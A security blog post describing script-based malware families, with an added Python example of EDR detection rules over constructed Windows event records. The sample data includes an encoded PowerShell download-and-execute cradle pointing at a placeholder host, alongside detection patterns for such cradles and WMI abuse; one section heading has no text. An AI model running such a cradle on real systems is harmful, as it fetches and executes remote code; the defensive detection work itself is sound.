What you will learn in this blog
- What is Script-Based Malware?
- Script-based techniques
- Why is it popular?
- What can you do to guard your devices against script-based malware?
Let’s take a look at why script-based malware has increased so dramatically over the past two years.
What is Script-Based Malware?
Cybercriminals often look for ways to get malicious files installed on your computer, but a fileless attack doesn’t need that. Instead, fileless malware is sneakier: it activates tools, software, and applications that are already built into your operating system and then hides inside your system. Script-based malware is often placed in the same category because it does not drop portable executable (PE) files on disk. Fileless malware piggybacks on legitimate scripts, carrying out malicious activity while the legitimate programs continue to run. It can remain undetected because it lives in memory rather than in a file. Traditional antivirus software works well against other malware types because it detects the signature footprints they leave on disk.
Script-based techniques may not be fileless, but they can still be challenging to detect. Two examples are Operation Cobalt Kitty and SamSam ransomware; both are malware attacks that use conventional fileless attack techniques. Here is a list of examples of script-based malware used to infect Windows users:
- SamSam ransomware
SamSam is perceived as semi-fileless. Without the initial script, the payload cannot be analyzed while files are in use, because the ransomware payload is decrypted only at run time, which makes finding a sample of the payload code elusive. The only way a sample can be captured for analysis is to witness the attack while it occurs. SamSam is continually evolving, which makes attacks like these difficult to detect and protect against. Plus, SamSam requires the involvement of its creator, who must enter a password, so it doesn’t spread automatically like other malware. To run, the creator has to enter the payload password or the disk decryption code. This makes it unrivaled in its use for single-purpose, targeted attacks.
- Operation Cobalt Kitty
Operation Cobalt Kitty is an instance of a fileless attack that spent nearly six months using malicious PowerShell to target an Asian corporation. More than 40 PCs and servers were infiltrated via a spear-phishing email.
- JScript Remote Access Trojan (RAT)
This RAT establishes persistence on the target system and then uses an encoded network connection to reach the attacker. After that, the attacker can run arbitrary commands on the target machine and potentially take full control of it.
- AutoIT downloader
The AutoIT downloader uses network and script functions to download and execute malware, which can be used to infect targeted systems with ransomware, spyware, and similar payloads.
Why is it popular?
What can you do to guard your devices against script-based malware?
The best way to prevent script-based malware infections on your devices is to stop them before they happen. However, the legacy antivirus solutions we once relied on no longer get the job done. Next-generation endpoint security solutions are being developed and will need to be deployed. These endpoint detection and response (EDR) solutions are based on continuous, real-time monitoring of phishing emails, incoming and outgoing network traffic, and suspicious activity in built-in tooling such as WMI and PowerShell. Fileless attacks often rely on human weakness, which means analyzing and detecting user and system behavior will be central to security. Critical, individual-level best practices include:
- Being wary of downloading and installing apps.
- Keeping up-to-date with software applications and security patches.
- Watching out for phishing emails.
- Updating browsers.
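To make the monitoring idea concrete, here is an added example (not code from the original post or from any vendor's EDR product) of the kind of behavioral rules an endpoint solution applies to PowerShell, WMI and script-host activity. It runs over a handful of constructed Windows event records, loosely modelled on Security 4688 process-creation and PowerShell 4104 script-block events; the event shapes, rule names and sample values are all assumptions made for the example. It decodes a `-EncodedCommand` payload so later rules can inspect the real script text, flags download-and-execute cradles, Office or mail clients spawning script hosts, process creation through WMI, and script hosts running files from user-writable folders.

```python
import base64
import re
from dataclasses import dataclass

# --- Constructed sample telemetry (made up for this example, not real captures).
# Loosely modelled on Windows Security 4688 (process creation) and
# PowerShell Operational 4104 (script block logging) records.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
# -EncodedCommand carries base64 of the UTF-16LE script text; build it here
# rather than hand-typing the base64 so the sample stays readable.
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"id": 4688, "parent": "outlook.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"id": 4104, "script": r"Get-ChildItem C:\Users\alice\Documents"},
    {"id": 4688, "parent": "explorer.exe", "image": "wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\alice\AppData\Roaming\update.js"},
    {"id": 4104, "script": "Invoke-WmiMethod -Class Win32_Process -Name Create "
                           "-ArgumentList 'notepad.exe'"},
    {"id": 4688, "parent": "services.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

# Hypothetical rule parameters; a real deployment would tune these lists.
OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b", re.I)
WMI_RE = re.compile(r"Win32_Process.*\bCreate\b", re.I)
USER_WRITABLE_SCRIPT_RE = re.compile(r"\\(?:AppData|Temp)\\.*\.(?:js|jse|vbs|vbe|wsf)\b", re.I)


@dataclass
class Finding:
    rule: str
    event_index: int
    detail: str


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script text, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(index: int, event: dict) -> list:
    """Apply every behavioral rule to one event and return the findings."""
    findings = []
    text = event.get("cmdline", "") or event.get("script", "")
    # Rule 1: encoded PowerShell command line; surface the decoded script.
    decoded = decode_encoded_command(text) if event["id"] == 4688 else None
    if decoded is not None:
        findings.append(Finding("encoded_command", index, decoded))
        text = text + "\n" + decoded  # let the later rules see the decoded text too
    # Rule 2: download-and-execute cradle in command line or script block.
    m = CRADLE_RE.search(text)
    if m:
        findings.append(Finding("download_cradle", index, m.group(0)))
    # Rule 3: Office or mail client spawning a script host (phishing attachment pattern).
    if (event["id"] == 4688 and event["parent"].lower() in OFFICE_PARENTS
            and event["image"].lower() in SCRIPT_HOSTS):
        findings.append(Finding("office_spawns_script_host", index,
                                f"{event['parent']} -> {event['image']}"))
    # Rule 4: process creation through WMI.
    m = WMI_RE.search(text)
    if m:
        findings.append(Finding("wmi_process_create", index, m.group(0)))
    # Rule 5: wscript/cscript running a script from a user-writable directory.
    if event["id"] == 4688 and event["image"].lower() in {"wscript.exe", "cscript.exe"}:
        m = USER_WRITABLE_SCRIPT_RE.search(text)
        if m:
            findings.append(Finding("script_host_from_user_writable", index, m.group(0)))
    return findings


def analyze_events(events) -> list:
    """Run the rules over a sequence of events, keeping each event's index."""
    out = []
    for i, ev in enumerate(events):
        out.extend(analyze_event(i, ev))
    return out


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_index}: {f.detail}")
```

Run as-is, the benign events (a directory listing and a scheduled backup script launched by `services.exe`) produce no findings, while the encoded command from Outlook yields three findings on its own: the encoding, the decoded download cradle, and the parent-child relationship. That layering is the point: a single rule is easy to evade, but a script-based intrusion usually trips several behavioral rules at once, which is what EDR products correlate.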
In this article, we talked about how attackers can use scripts to carry out malicious activities on target Windows machines. These scripts don’t reinvent the wheel, but they offer attackers flexibility and accessibility. As we saw in our study, these benefits allow attackers to execute commands and thus potentially gain full control over target machines, which gives them an incentive to choose this option. Infection risk is much lower for organizations with skilled cybersecurity professionals and up-to-date Windows hosts that follow security best practices for secure web browsing. Cyber threats have evolved, and so have we!